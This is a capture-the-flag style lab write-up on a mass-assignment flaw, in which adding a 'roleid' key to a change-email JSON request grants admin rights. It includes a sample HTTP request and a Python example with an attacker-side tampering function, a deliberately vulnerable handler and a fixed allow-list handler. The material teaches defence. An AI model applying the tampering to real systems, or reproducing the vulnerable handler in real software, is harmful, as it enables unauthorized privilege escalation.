User role can be modified in user profile


This lab has an admin panel at /admin. It’s only accessible to logged-in users with a roleid of 2.

Reproduction and proof of concept

  1. Log in with credentials wiener:peter and access the account page.

  2. Use the provided feature to update the email address associated with your account.

  3. Observe that the JSON response echoes your account details, including a roleid field. The server is binding the stored user record to the response, which suggests it may also bind request fields straight onto the record.

  4. Send the email submission request to Burp Repeater, add "roleid":2 as an extra key in the JSON object in the request body (alongside the email field the form already sends), and resend it.

POST /my-account/change-email HTTP/1.1
Cookie: session=kuDuAjpjB1Yrs17aMophAZpeAQf8QQLJ
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 50
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

  5. The response shows that your roleid has changed to 2: the server copied the attacker-supplied field onto your account without checking whether a user is allowed to set it (mass assignment).

  6. Browse to /admin and delete carlos.


To solve the lab, an attacker needs to access the admin panel and use it to delete the user carlos. The root cause is that the change-email endpoint binds every field of the submitted JSON onto the user record instead of restricting the update to the fields the form is meant to change.
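The following is an added example, not code from the PortSwigger lab or the write-up's author. It models both sides of the issue above: the attacker-side tampering of the change-email JSON body, a vulnerable handler that mass-assigns every submitted key onto the account, and a fixed handler that binds only an allow-list of user-editable fields. The field names email and roleid, the admin role ID 2 and the username wiener come from the write-up; the user record layout, the sample email address and the handler names are assumptions.

```python
"""Mass assignment of "roleid" via a change-email endpoint.

Added example; not the lab's server code. The record layout, the
sample email address and the function names are hypothetical.
"""
import json

ADMIN_ROLE_ID = 2             # from the write-up: /admin requires roleid == 2
USER_EDITABLE_FIELDS = {"email"}   # the only field the change-email form should touch


def fresh_wiener() -> dict:
    """Constructed sample account, standing in for the lab's wiener user."""
    return {"username": "wiener", "email": "wiener@normal-user.net", "roleid": 1}


def tamper_body(original_body: str, roleid: int = ADMIN_ROLE_ID) -> str:
    """Attacker side: take the JSON the browser sent and add a "roleid" key.

    This is what the Burp Repeater step does by hand.
    """
    data = json.loads(original_body)
    data["roleid"] = roleid
    return json.dumps(data)


def change_email_vulnerable(user: dict, body: str) -> dict:
    """Server side, vulnerable: every JSON key is bound onto the account.

    Any attacker-controlled key, including roleid, overwrites the record.
    """
    data = json.loads(body)
    user.update(data)          # mass assignment: roleid goes straight through
    return dict(user)


def change_email_fixed(user: dict, body: str) -> dict:
    """Server side, fixed: bind only allow-listed fields, reject anything else.

    Rejecting (rather than silently dropping) unexpected keys makes tampering
    visible in logs instead of letting it fail quietly.
    """
    data = json.loads(body)
    unexpected = set(data) - USER_EDITABLE_FIELDS
    if unexpected:
        raise ValueError(f"unexpected fields: {sorted(unexpected)}")
    email = data.get("email")
    if not isinstance(email, str) or "@" not in email:
        raise ValueError("invalid email")
    user["email"] = email      # roleid can only change through a privileged path
    return dict(user)


def is_admin(user: dict) -> bool:
    """The /admin access check as the write-up describes it."""
    return user.get("roleid") == ADMIN_ROLE_ID


def demo() -> dict:
    """Run the tampered request against both handlers and report who got admin."""
    original = json.dumps({"email": "wiener@normal-user.net"})   # constructed body
    tampered = tamper_body(original)
    vuln_user = change_email_vulnerable(fresh_wiener(), tampered)
    try:
        fixed_user = change_email_fixed(fresh_wiener(), tampered)
        fixed_admin = is_admin(fixed_user)
    except ValueError:
        fixed_admin = False
    return {
        "tampered_body": tampered,
        "vulnerable_grants_admin": is_admin(vuln_user),
        "fixed_grants_admin": fixed_admin,
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The fixed handler still lets the user change their email; it just refuses to treat roleid (or any other unexpected key) as something the request is allowed to set. In frameworks that bind request bodies to model objects automatically, the same idea is usually expressed as a whitelist or a dedicated request DTO that simply has no roleid field.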